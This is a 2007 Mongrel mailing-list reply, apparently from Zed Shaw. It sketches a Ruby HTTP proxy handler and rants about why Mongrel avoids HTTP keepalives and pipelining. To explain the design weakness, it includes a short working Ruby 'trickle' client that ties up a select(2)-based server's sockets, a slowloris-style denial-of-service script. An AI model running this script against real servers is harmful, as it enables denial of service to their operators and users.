On Thu, 4 Jan 2007 13:22:51 -0700
"Chad Woolley" <[EMAIL PROTECTED]> wrote:

> Hi,
>

Chad!  How's it going, man?  Sorry, but I gotta rant for a second here.
 
> I'm looking for suggestions on the simplest way to implement an HTTP
> proxy under Rails/Mongrel.  It should preserve ALL of the proxied HTTP
> response - including all header content such as keepalives, etc.
> 
> Yes, I know I can do this with Apache's proxy module, and we already
> do that for the non-development/test environments.  This is just for
> the development/test environment where we don't run Apache, just
> Mongrel.

It might be possible, but you'd probably have better luck with pound or 
another dedicated proxy.  Hit me up off-line for some help.
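
If you really want it in-process, here's a rough sketch of the idea: a 
bare-bones, GET-only pass-through handler.  This is untested, the upstream 
address is made up, and note that it will NOT preserve hop-by-hop headers 
like Connection or Keep-Alive, because Mongrel manages the connection 
itself:

  require 'mongrel'
  require 'net/http'

  # Hypothetical upstream -- point it at whatever you're proxying.
  UP_HOST, UP_PORT = "localhost", 4000

  # Hop-by-hop headers, plus ones Mongrel computes itself.
  SKIP = %w(connection keep-alive transfer-encoding content-length)

  class ProxyHandler < Mongrel::HttpHandler
    def process(request, response)
      # REQUEST_URI already includes any query string.
      path = request.params["REQUEST_URI"] || "/"
      upstream = Net::HTTP.start(UP_HOST, UP_PORT) { |h| h.get(path) }
      response.start(upstream.code.to_i) do |head, out|
        upstream.each_header do |name, value|
          head[name] = value unless SKIP.include?(name.downcase)
        end
        out.write(upstream.body)
      end
    end
  end

  server = Mongrel::HttpServer.new("0.0.0.0", 3000)
  server.register("/", ProxyHandler.new)
  server.run.join

Forwarding POSTs and the client's request headers is left as an exercise, 
which is exactly why I'd still point you at pound.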

> http://lists.netisland.net/archives/phillyonrails/phillyonrails-2006/msg00231.html

First off, Brian McCallister is wrong.  He's been here before, asking about 
pipelines and keepalives and all sorts of other crap, and I answered him 
without much response.  Apparently he's now trolling in other locations:  

  "I presume something in the design of Mongrel makes it tough to implement 
keep-alives. Saying that they are poorly specced, or hurt performance for the 
protocol or client is, umh, wrong, however. I have a hunch that the reason 
comes back to the choice to actually build an HTTP grammar with the ragel FSM 
compiler and making the FSM clean across requests on a single connection has 
proven difficult."

Here are the reasons, which I covered with Brian previously, that Mongrel 
doesn't do keepalives or pipelining:

1) The last study on HTTP pipelining performance (the one everyone 
references) was done in 1999, with dubious methodology and limited 
repeatability.  
http://www.w3.org/Protocols/HTTP/Performance/Pipeline
2) That study doesn't cover dynamic content from dynamic languages over a 
localhost adapter, which is the situation Mongrel is most commonly used in.
3) Keepalives and pipelining have ambiguous semantics, so they're difficult 
to implement reliably.  They also open up several design flaws that let 
clients take down servers with "trickle" attacks.
4) RUBY USES select(2) AND ON MOST SYSTEMS CAN ONLY WATCH 1024 OR FEWER 
FILE DESCRIPTORS AT ONCE.
5) Given #1, #2, #3, and #4, a client can connect to a Ruby-based web 
server and slowly trickle out a series of pipelined requests (each allowed 
up to 128k of headers), tying up all of the available sockets (which in 
practice amounts to about 256 to 500) until the server is useless.  There's 
a sketch of this after the list.
6) The performance measurements I did showed that, when processing requests 
over localhost, these parts of HTTP made no improvement at all.  That's a 
combination of localhost being pretty damn good on many systems, and Ruby 
being slow as dirt.
7) Also, there's actually a performance boost when the connection is simply 
closed right away.  The reason: http://www.ajaxperformance.com/?p=33
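
To make #4 and #5 concrete, here's a sketch of what such a trickle client 
looks like.  The host, port, and numbers are all made up -- don't point 
this at anything you care about:

  require 'socket'

  # Hypothetical target: a select(2)-based Ruby web server.
  HOST, PORT, CONNS = "localhost", 3000, 500

  # Open a pile of connections.  A select(2)-based server tops out at
  # 1024 descriptors total, and more like 256 to 500 usable in practice.
  socks = Array.new(CONNS) { TCPSocket.new(HOST, PORT) }

  # Start a request on every socket but never finish any of them,
  # dribbling out one bogus header at a time.
  socks.each { |s| s.write("GET / HTTP/1.1\r\nHost: #{HOST}\r\n") }
  loop do
    socks.each { |s| s.write("X-Trickle: #{rand(10)}\r\n") }
    sleep 5  # slow enough to hog sockets, fast enough to dodge timeouts
  end

Every one of those connections is a legal, in-progress request, so the 
server can't just drop them without also breaking slow-but-honest clients.  
That's the ambiguity from #3 biting you.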

That's right: most browsers don't even use this incredibly dense, horribly 
designed, stupid addition to the HTTP protocol.  Tell me, what's the point 
of maintaining all these connections if browsers don't use them?  Huh?

Ragel is not the reason; the parser was built that way after lots of 
testing and experimentation.  I'm not an idiot, and the above comment 
pisses me off to no end.  If Ruby could handle it, I'd have implemented it 
for no other reason than to make these idiots who know jack-all about 
protocol design or measurement shut up and actually use the damn thing.

-- 
Zed A. Shaw, MUDCRAP-CE Master Black Belt Sifu
http://www.zedshaw.com/
http://www.awprofessional.com/title/0321483502 -- The Mongrel Book
http://mongrel.rubyforge.org/
http://www.lingr.com/room/3yXhqKbfPy8 -- Come get help.
_______________________________________________
Mongrel-users mailing list
Mongrel-users@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-users
